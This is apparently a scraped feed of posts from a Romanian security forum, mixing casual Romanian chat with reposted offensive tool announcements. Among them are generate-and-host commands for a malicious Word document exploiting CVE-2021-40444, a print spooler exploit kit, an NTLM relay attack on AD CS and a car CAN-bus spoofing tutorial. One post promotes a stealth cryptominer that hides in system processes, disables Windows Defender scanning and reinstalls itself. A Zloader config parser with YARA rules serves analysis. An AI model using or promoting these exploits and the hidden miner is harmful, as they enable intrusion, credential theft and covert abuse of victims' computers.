bio.sh

vad ca ai .bin acolo, arde-l pe un iso sau il poti monta...have fun

pe 30 mi-o dau si eu, sper ca avea dreptate Nytro cu socketul ala, revin cu detalii

Quoting Emilut on this one: "Da pula...."

romanian covid team

Hey, remember that time you got polio? No, you don't, because your parents got you f*cking vaccinated

LOL...worst case scenario...flemon Quote: https://www.prospecte.net/administrarea-medicamentelor-prin-injectie-intramusculara/

E buna ma, e naturala

Si uite asa m-ai convins sa ma vaccinez

te-ai bagat si tu ca chilotul

https://twitter.com/vxunderground/status/1445105329461682178 A user under the name "CBT" release 600 tb of Facebook data, They are claiming responsability for the Facebook, Instagram and WhatsAPP outage.

Care veniti? Facem o brigada?

"Sunt curios" unde se duc aia 10%

Malicious docx generator to exploit CVE-2021-40444 (Microsoft Office Word Remote Code Execution) Creation of this Script is based on some reverse engineering over the sample used in-the-wild: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (docx file) You need to install lcab first (sudo apt-get install lcab) Check REPRODUCE.md for manual reproduce steps If your generated cab is not working, try pointing out exploit.html URL to calc.cab Using First generate a malicious docx document given a DLL, you can use the one at test/calc.dll which just pops a calc.exe from a call to system() python3 exploit.py generate test/calc.dll http://<SRV IP> Once you generate the malicious docx (will be at out/) you can setup the server: sudo python3 exploit.py host 80 Finally try the docx in a Windows Virtual Machine: Download Link : https://github.com/lockedbyte/CVE-2021-40444

```from mwcp.parser import Parser import struct import string import pefile import yara import re from Crypto.Cipher import ARC4 import logging log = logging.getLogger(__name__) rule_source = ''' rule Zloader { meta: description = "Zloader Payload" cape_type = "Zloader Payload" strings: $rc4_init = {31 [1-3] 66 C7 8? 00 01 00 00 00 00 90 90 [0-5] 8? [5-90] 00 01 00 00 [0-15] (74|75)} $decrypt_conf = {e8 ?? ?? ?? ?? e8 ?? ?? ?? ?? e8 ?? ?? ?? ?? e8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? e8 ?? ?? ?? ?? 83 c4 08 e8 ?? ?? ?? ??} condition: uint16(0) == 0x5A4D and any of them } ''' MAX_STRING_SIZE = 32 yara_rules = yara.compile(source=rule_source) def decrypt_rc4(key, data): cipher = ARC4.new(key) return cipher.decrypt(data) def string_from_offset(data, offset): string = data[offset : offset + MAX_STRING_SIZE].split(b"\0")[0] return string class Zloader(Parser): DESCRIPTION = 'Zloader configuration parser' def run(self): filebuf = self.file_object.file_data pe = pefile.PE(data=filebuf, fast_load=False) image_base = pe.OPTIONAL_HEADER.ImageBase matches = yara_rules.match(data=filebuf) if not matches: return for match in matches: if match.rule != "Zloader": continue for item in match.strings: if '$decrypt_conf' in item[1]: decrypt_conf = int(item[0])+21 va = struct.unpack("I",filebuf[decrypt_conf:decrypt_conf+4])[0] key = string_from_offset(filebuf, pe.get_offset_from_rva(va-image_base)) data_offset = pe.get_offset_from_rva(struct.unpack("I",filebuf[decrypt_conf+5:decrypt_conf+9])[0]-image_base) enc_data = filebuf[data_offset:].split(b"\0\0")[0] raw = decrypt_rc4(key, enc_data) items = list(filter(None, raw.split(b'\x00\x00'))) self.reporter.add_metadata("other", {"Botnet name": items[1].lstrip(b'\x00')}) self.reporter.add_metadata("other", {"Campaign ID": items[2]}) for item in items: item = item.lstrip(b'\x00') if item.startswith(b'http'): self.reporter.add_metadata("address", item) elif len(item) == 16: self.reporter.add_metadata("other", {"RC4 key": item}) return```

SpoolSploit: collection of Windows print spooler exploits Summary SpoolSploit is a collection of Windows print spooler exploits containerized with other utilities for practical exploitation. A couple of highly effective methods would be relaying machine account credentials to escalate privileges and execute malicious DLLs on endpoints with full system access. Download link : https://github.com/BeetleChunks/SpoolSploit#create-and-access-the-spoolsploit-docker-container

The goal of this article is to get you started hacking cars — fast, cheap, and easy. In order to do this, we’ll spoof the RPM gauge as an example. The following is by no means an exhaustive tutorial. It instead aims to provide just enough information to get you up and running. If you want to dig deeper you can checkout the must-reads at the end. If you decide to carry out this tutorial in real life, you’ll need a Linux computer (or a virtual Linux machine), and a CAN-to-USB device (which we’ll look into later). A car is a network A car consists of multiple computers to control the engine, transmission, windows, locks, lights, etc. These computers are called electronic control units (ECU) and communicate with each other over a network. For example, when you press the button on your steering wheel to increase the volume of the radio, the steering wheel ECU sends a command to increase volume onto the network, the radio ECU then sees this command and acts accordingly. There are multiple networks in a car, generally at least two: One for critical data such as engine and powertrain messages And one for less critical data such as radio and door locks The critical network uses a fast and reliable protocol whereas the non-critical network uses a slower, less reliable but cheaper protocol. The number of networks as well as which ECUs are networked together depends on the car make, model and year. An ECU could also be connected to multiple networks. Reference link : https://www.freecodecamp.org/news/hacking-cars-a-guide-tutorial-on-how-to-hack-a-car-5eafcfbbb7ec/ Connecting to a network Some networks can be accessed via the OBD-II port. OBD-II is mandatory on all cars and light trucks built in the US after 1996 and Europe after 2004. The connector is in arms reach of the driver’s seat. You might need to lift off some plastic cover but it is always accessible without tools. Software To communicate with the device you need to install the can-utils package on your Linux machine. You can do this via by typing the following into the Linux prompt: sudo apt-get install can-utils Can-utils makes it extremely easy to send, receive and analyze CAN packets. These are the commands that we will use. cansniffer display only the packets that are changing candump dump all received packets cansend send a packet Linux has CAN support built in to the kernel via SocketCAN. This makes it easy to write your own additional programs. You can interact with the CAN bus in the same way you would interact with any other network i.e. via sockets.

Deployment of an Active Directory Certificate Services (AD CS) on a corporate environment could allow system administrators to utilize it for establishing trust between different directory objects. However, it could allow red team operators to conduct an NTLM relay attack towards the web interface of an AD CS in order to compromise the network. The web interface is used for allowing users to obtain a certificate (web enrollment), is over HTTP protocol, doesn’t support signing and accepts NTLM authentication. The details of the attack have been presented by Will Schroeder and Lee Christensen in the Certified Pre-Owned whitepaper. The attack forces the domain controller machine account (DC$) to authenticate towards a host which NTLM relay is configured. The authentication is relayed towards the Certificate Authority (CA) and raises a request for a certificate. Once the certificate is generated for the DC$ account an attacker could use this perform arbitrary operations on the domain controller such as retrieving the hash of the Kerberos account in order to create a golden ticket and establish domain persistence or dump hashes of domain administrators and establish a communication channel with the domain controller. Reference link , more info and examples : https://pentestlab.blog/2021/09/14/petitpotam-ntlm-relay-to-ad-cs/

SilentXMRMiner v1.4.4 - Based on Lime Miner v0.3 Can mine all the following algorithms and thus all the cryptocurrencies that use them: List of algorithms Main Features .NET - Coded in C#, requires .NET Framework 4.5 Injection (Silent/Hidden) - Hide payload behind another process like explorer.exe, conhost.exe, svchost.exe or some other process CPU & GPU Mining - Can mine on Both CPU and GPU (Nvidia & AMD) Idle Mining - Can be configured to mine at different usages or not at all while computer is or isn't in use Stealth - Pauses the miner and clears the GPU memory while any of the programs in the "Stealth Targets" option are open Watchdog - Replaces the miner file if removed and starts it if the injected miner is closed down Remote Configuration - Can get the miner settings remotely from a URL every 100 minutes Bypass Windows Defender - Adds exclusions into Windows Defender for the general folders the miner uses Online Downloader - Can download the miner binary during runtime to greatly decrease file size and detections Download Links : https://github.com/UnamSanctam/SilentXMRMiner https://github.com/UnamSanctam/SilentETHMiner

As baga niste mici

dc dreacu ai deschide asemenea fisier cu un editor?clar il omori :))... why not less/more?sau split cum ti-a zis si kev

Preturi europene, salarii africane, sistem de rahat... Scapa cine poate

Obs si ftp?

ti-am lasat de atunci un pm cu ceva similar...vezi daca te ajuta cu ceva